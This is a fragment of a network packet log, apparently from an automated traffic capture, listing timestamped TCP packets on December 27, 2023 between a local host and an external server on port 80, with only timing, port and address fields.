Dec 27, 2023 17:57:25.622015953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.622790098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.622848988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.622864008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.622875929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.622890949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.622903109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.622941017 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.623747110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.623764992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.623778105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.623797894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.623810053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.623811007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.623825073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.623856068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.624560118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.624603987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.624619007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.624661922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.624676943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.624692917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.624717951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.625538111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.625554085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.625581026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.625590086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.625631094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.625653982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.625669003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.625708103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.626411915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.626427889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.626538038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.626552105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.626565933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.626585007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.626616001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.627361059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.627376080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.627403975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.627414942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.627430916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.627444029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.627470016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.627480984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.628200054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.628215075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.628261089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.628281116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.628294945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.628341913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.628355980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.629086018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.629100084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.629136086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.629149914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.629164934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.629170895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.629203081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.630028963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.630044937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.630057096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.630073071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.630096912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.630108118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.630130053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.630882978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.630899906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.630914927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.630923986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.630928993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.630961895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.630971909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.631015062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.631752968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.631813049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.631828070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.631841898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.631860971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.631864071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.631886959 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.632909060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.632944107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.632949114 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.632961035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.632975101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.633008957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.633028030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.633177996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.633552074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.633567095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.633609056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.633619070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.633625031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.633640051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.633661032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.634392023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.634442091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.634462118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.634476900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.634489059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.634514093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.634546041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.634572029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.635360956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.635375977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.635387897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.635401011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.635412931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.635421038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.635453939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.636195898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.636209011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.636259079 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.636334896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.636349916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.636364937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.636373997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.636403084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.637099028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.637113094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.637160063 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.637161970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.637176991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.637191057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.637227058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.638113022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.638127089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.638139009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.638153076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.638160944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.638166904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.638197899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.638222933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.638864040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.638879061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.638920069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.638933897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.638935089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.638947964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.638983965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.639759064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.639774084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.639803886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.639825106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.639843941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.639844894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.639859915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.639894962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.640634060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.640669107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.640693903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.640708923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.640714884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.640729904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.640748978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.641427994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.641462088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.641472101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.641477108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.641493082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.641515970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.641560078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.641596079 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.642304897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.642352104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.642365932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.642379999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.642394066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.642405033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.642453909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.643197060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.643210888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.643224955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.643232107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.643239975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.643254042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.643259048 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.643286943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.644191980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.644207001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.644220114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.644232988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.644246101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.644247055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.644278049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.644968987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.644983053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.644999027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.645020962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.645028114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.645035028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.645061970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.645081043 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.645859957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.645874977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.645886898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.645900011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.645912886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.645926952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.645956993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.646733999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.646747112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.646759033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.646771908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.646779060 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.646784067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.646797895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.646821022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.651776075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.651819944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.651834965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.651879072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.651953936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.651995897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.652005911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.652019978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.652038097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.652051926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.652065992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.652076006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.652081013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.652096033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.652103901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.652121067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.652124882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.652137995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.652151108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.652163029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.652173996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.652199984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.652435064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.652450085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.652473927 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.652482033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.652497053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.652509928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.652518034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.652550936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.653331995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.653373003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.653386116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.653400898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.653415918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.653446913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.653493881 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.654058933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.654100895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.654115915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.654155970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.654158115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.654170990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.654179096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.654216051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.654973984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.655040026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.655056000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.655070066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.655083895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.655097008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.655128956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.655760050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.655775070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.655811071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.655818939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.655858994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.655899048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.655915022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.655965090 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.656629086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.656651974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.656701088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.656706095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.656717062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.656816959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.656868935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.657481909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.657524109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.657547951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.657562971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.657579899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.657594919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.657620907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.657649040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.658374071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.658389091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.658433914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.658436060 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.658451080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.658466101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.658493996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.659095049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.659138918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.659138918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.659156084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.659198999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.659221888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.659236908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.659302950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.659909010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.659985065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.660001040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.660018921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.660038948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.660064936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.660095930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.660751104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.660794020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.660844088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.660851955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.660868883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.660881042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.660897970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.660931110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.661607027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.661700010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.661714077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.661747932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.661758900 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.661762953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.661794901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.662483931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.662497997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.662511110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.662524939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.662524939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.662542105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.662549019 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.662591934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.663225889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.663296938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.663311958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.663325071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.663338900 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.663338900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.663364887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.664091110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.664105892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.664119005 CET	80	49738	5.42.65.125	192.168.2.4
